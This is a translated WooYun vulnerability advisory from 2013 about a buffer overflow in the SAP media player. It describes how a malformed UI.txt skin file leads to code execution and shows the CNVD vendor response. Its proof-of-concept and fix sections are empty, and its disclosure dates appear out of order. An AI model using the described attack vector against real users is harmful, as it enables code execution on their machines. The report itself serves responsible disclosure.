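Vulnerability Summary
Bug ID: wooyun-2013-016921
Vulnerability title: SAP player buffer overflow vulnerability
Affected vendor: SAP
Vulnerability author: cssembly
Submitted: 2013-01-04 20:21
Fixed: 2013-02-18 20:22
Published: 2013-02-18 20:22
Vulnerability type: Remote code execution
Severity: High
Self-assessed Rank: 12
Vulnerability status: Handed over to a third-party partner organization (cncert, the National Internet Emergency Center) for handling
Vulnerability source: http://www.wooyun.org; for questions or help, contact [email protected]
Tags: None
Vulnerability Details
Disclosure status:
2013-01-04: Details reported to the vendor, awaiting vendor handling
2013-01-07: Vendor has confirmed; details disclosed only to the vendor
2013-01-10: Details opened to third-party security partners
2013-03-03: Details disclosed to core white hats and experts in related fields
2013-03-13: Details disclosed to regular white hats
2013-03-23: Details disclosed to intern white hats
2013-02-18: Details disclosed to the public
Brief description:
The SAP player has a buffer overflow vulnerability when parsing skin files, which leads to arbitrary code execution.
Detailed description:
During startup, SAP loads the UI.txt file from the skin\default directory. Because the program does not validate the file's contents, loading a malformed file causes a buffer overflow and executes malicious code!
The PoC is as follows: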
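Proof of vulnerability:
Fix:
Copyright notice: When reposting, please credit the source cssembly@WooYun
Vulnerability Response
Vendor response:
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2013-01-07 22:18
Vendor reply:
CNVD has confirmed and reproduced the issue described. cssembly's research on the SAP player is fairly thorough, and this is the second case. After several days of effort, CNVD has notified the foreign software vendor by English-language e-mail; whether it will be handled awaits further feedback.
Scored as a general-purpose software vulnerability; compared with the previous case, this one has relatively lower exploitation value. rank 10
Latest status:
None yet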